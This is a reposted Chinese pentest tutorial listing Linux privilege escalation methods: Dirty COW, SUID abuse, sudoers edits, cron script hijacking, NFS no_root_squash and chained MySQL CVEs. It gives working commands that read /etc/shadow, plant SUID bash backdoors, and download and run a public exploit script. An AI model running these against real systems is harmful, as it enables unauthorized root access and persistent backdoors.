Linux提權的幾種常用方式
本文轉載自微信公眾號「Bypass」,作者Bypass 。轉載本文請聯系Bypass公眾號。
在滲透測試過程中,提升權限是非常關鍵的一步,攻擊者往往可以通過利用內核漏洞/權限配置不當/root權限運行的服務等方式尋找突破點,來達到提升權限的目的。
1、內核漏洞提權
提起內核漏洞提權就不得不提到臟牛漏洞(Dirty Cow),是存在時間最長且影響范圍最廣的漏洞之一。低權限用戶可以利用該漏洞實現本地提權,同時可以通過該漏洞實現Docker容器逃逸,獲得root權限的shell。
1.1 本地內核提權
(1)檢測內核版本
- # 查看系統發行版本
- lsb_release -a
- # 查看內核版本
- uname -a
(2) 下載,編譯生成exp文件
- bypass@ubuntu:~$ make
(3)執行成功,返回一個root權限的shell。
1.2 利用DirtyCow漏洞實現Docker逃逸
(1)進入容器,編譯POC并執行:
(2)在攻擊者機器上,成功接收到宿主機反彈的shell。
1.3 Linux提權輔助工具
github項目地址:
- https://github.com/mzet-/linux-exploit-suggester.git
(1)根據操作系統版本號自動查找相應提權腳本
- wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
(2)根據提示下載poc,編譯執行。
2、利用SUID提權
SUID是一種特殊權限,可以讓調用者在執行過程中暫時獲得該文件擁有者的權限。如果可以找到并運行root用戶所擁有的SUID的文件,那么就可以在運行該文件的時候獲得root用戶權限。
(1)在Linux中查找可以用來提權的SUID文件
- find / -perm -u=s -type f 2>/dev/null
(2)通過find以root權限執行命令
可用作Linux提權的命令及其姿勢:
- #Find
- find pentestlab -exec whoami \;
- #Vim
- vim.tiny /etc/shadow
- #awk
- awk 'BEGIN{system("whoami")}'
- #curl
- curl file:///etc/shadow
- #Bash
- bash -p
- #Less
- less /etc/passwd
- #Nmap
- nmap --interactive
3、SUDO提權
普通用戶在使用sudo執行命令的過程中,會以root方式執行命令。在很多場景里,管理員為了運維管理方便,sudoer配置文件錯誤導致提權。
(1)設置sudo免密碼
- $vi /etc/sudoers
- 在最后一行添加:bypass ALL=(ALL:ALL) NOPASSWD:ALL
(2)查看sudo的權限
4、計劃任務
如果可以找到可以有權限修改的計劃任務腳本,就可以修改腳本實現提權。本質上,就是文件權限配置不當。
(1)查看計劃任務,找到有修改權限的計劃任務腳本。
- ls -l /etc/cron*
- more /etc/crontab
(2)在mysqlback.sh 添加 SUID shell后門,當定時任務以root再次執行的時候,可以獲取root權限。
- cp /bin/bash /tmp/shell
- chmod u+s /tmp/shell
5、NFS提權
當服務器中存在NFS共享,開啟no_root_squash選項時,如果客戶端使用的是root用戶,那么對于共享目錄來說,該客戶端就有root權限,可以使用它來提升權限。
(1)查看NFS服務器上的共享目錄
- sudo showmount -e 10.1.1.233
(2)創建本地掛載目錄,掛載共享目錄。使用攻擊者本地root權限創建Suid shell。
- sudo mkdir -p /tmp/data
- sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data
- cp /bin/bash /tmp/data/shell
- chmod u+s /tmp/data/shell
(3)回到要提權的服務器上,使用普通用戶使用-p參數來獲取root權限。
6、MySQL提權
MySQL提權方式有UDF提權,MOF提權,寫入啟動項提權等方式,但比較有意思的是CVE-2016-6663、CVE-2016-6664組合利用的提取場景,可以將一個www-data權限提升到root權限。
(1)利用CVE-2016-6663將www-data權限提升為mysql權限:
- cd /var/www/html/
- gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
- ./mysql-privesc-race test 123456 localhost testdb
(2)利用CVE-2016-6664將Mysql權限提升為root權限:
- wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
- chmod 777 mysql-chowned.sh
- ./mysql-chowned.sh /var/log/mysql/error.log
